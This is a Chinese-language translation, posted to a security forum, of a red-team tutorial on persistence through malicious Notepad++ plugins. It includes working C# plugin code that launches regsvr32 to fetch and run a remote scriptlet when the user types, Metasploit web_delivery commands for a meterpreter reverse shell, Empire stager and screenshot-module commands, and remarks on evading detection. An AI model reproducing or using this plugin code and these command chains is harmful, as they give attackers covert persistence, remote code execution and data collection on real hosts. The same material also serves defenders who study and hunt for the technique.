-
-
[翻译]持久化技术——Notepad++ 插件
-
发表于: 2022-3-25 15:35 809
-
备注
原文标题:Persistence – Notepad++ Plugins
原文地址: https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
翻译人员:梦幻的彼岸
注意信息:安全起见,可根据文章内容参考排查
正文
windows环境,尤其是由开发人员或It人员管理的专用服务器,安装了Notepad++文本编辑器,这种情况并不少见。除了可以为红队操作人员提供重要信息的脚本和管理员命令的存储之外,它还可以作为一种持久性机制,通过加载任意插件,从远程位置执行命令或脚本。
Daniel Duggan在一篇文章中强调了通过Notepad++插件实现持久性的想法.插件可以用来扩展Notepad++的功能。默认情况下,用户可以在Notepad++中下载已批准的插件列表,但也允许自定义插件,无需任何验证,从而为开发人员扩展文本编辑器的使用提供了灵活性。插件以DLL文件的形式存储在以下路径中:
%PROGRAMFILES%\Notepad++\plugins
需要注意的是,为了加载插件,文件夹和DLL需要有相同的名称。 对于红队操作人员来说,不需要从头开始编写恶意插件,因为Notepad++插件包可以用作模板。当特定事件发生时,可以使用各种API执行任意操作。当在notepad++中键入字符时,SCI_ADDTEXT API将触发一个自定义命令。在下面的示例中,插入字符时会出现一个消息框。
class Main { static bool ExecuteOnce = true; public static void OnNotification(ScNotification notification) { if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && ExecuteOnce) { MessageBox.Show("Persistence via Notepad++ - Visit https://pentestlab.blog"); ExecuteOnce = !ExecuteOnce; } }
编译代码将生成DLL文件。这种技术可以在提升用户(如管理员)的环境下使用,因为将插件放入“程序文件”的相关子文件夹需要写入权限。
dir "C:\Program Files\Notepad++\plugins\pentestlab"
下次启动Notepad++并键入字符时,将出现消息框,表明代码已成功执行。
无文件的payload也可以被执行,以建立一个通信渠道。一种非常流行的技术是利用regsvr32窗口二进制文件,以便从远程位置执行一个小脚本。Metasploit框架通过网络传递模块支持这种技术。执行下面的命令将启动一个服务器,payload将被托管。
use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.3 set LPORT 4444 run
代码可以稍作修改,以执行带有所需参数的regsvr32。
class Main { static bool firstRun = true; public static void OnNotification(ScNotification notification) { if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && firstRun) { string strCmdText; strCmdText = "/s /n /u /i:http://10.0.0.3:8080/nHIcvfz6N.sct scrobj.dll"; Process.Start("regsvr32", strCmdText); firstRun = !firstRun; } }
同样,与最初的例子一样,当在Notepad++中输入一个新字符时,将触发事件,执行命令。
一个Meterpreter会话将打开,并建立一个通信通道。
执行以下命令将启动与目标主机的交互,并检索父工作目录以及哪个用户触发了payload。
sessions sessions -i 1 pwd getuid
Empire
以类似的方式,Empire C2可用于生成各种stager文件。这些文件通常包含可以在PowerShell进程中执行的base64命令。以下阶段已被用作示例:
usestager windows/launcher_sct
stager应该指向已经在Empire中运行的侦听器,execute命令将文件写入“generated stager”文件夹。
set Listener http execute
stager应该指向已经在Empire中运行的侦听器,execute命令将文件写入“generated stager”文件夹。
该文件可以放入系统中,并通过regsvr32执行。或者,该命令可以在插件内部使用,以避免编写代码。将.sct文件放入磁盘。
agents
其他Empire模块可用于执行进一步的活动,如拍摄主机的屏幕截图。Notepad++中包含用户名、连接字符串或URL等信息的情况并不少见,这些信息可以通过这种方法提取并在攻击性操作中使用。
usemodule powershell/collection/screenshot set Agent notepad execute
应该注意的是,创建一个进程并不被认为是opsec安全的方法。然而,通过修改代码,红队操作人员可以使用其他过程注入技术,使他们能够保持低调。该技术的一个缺点是,需要用户键入一个字符,因此可能无法持续接收信标。然而,从积极的一面来看,它并不被认为是一种常见的持久性技术,甚至在成熟的环境中也可能规避检测。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
- [原创]物联网安全:基础篇 4215
- 威胁情报小课堂:阻止活跃勒索软件的感染 2218
- [翻译]发现利用 Facebook 和 MS 管理控制台实施的 Kimsuky APT 攻击 7121
- 威胁情报小课堂:LockBit Black 2112
- 威胁情报小课堂:Nitrogen 2102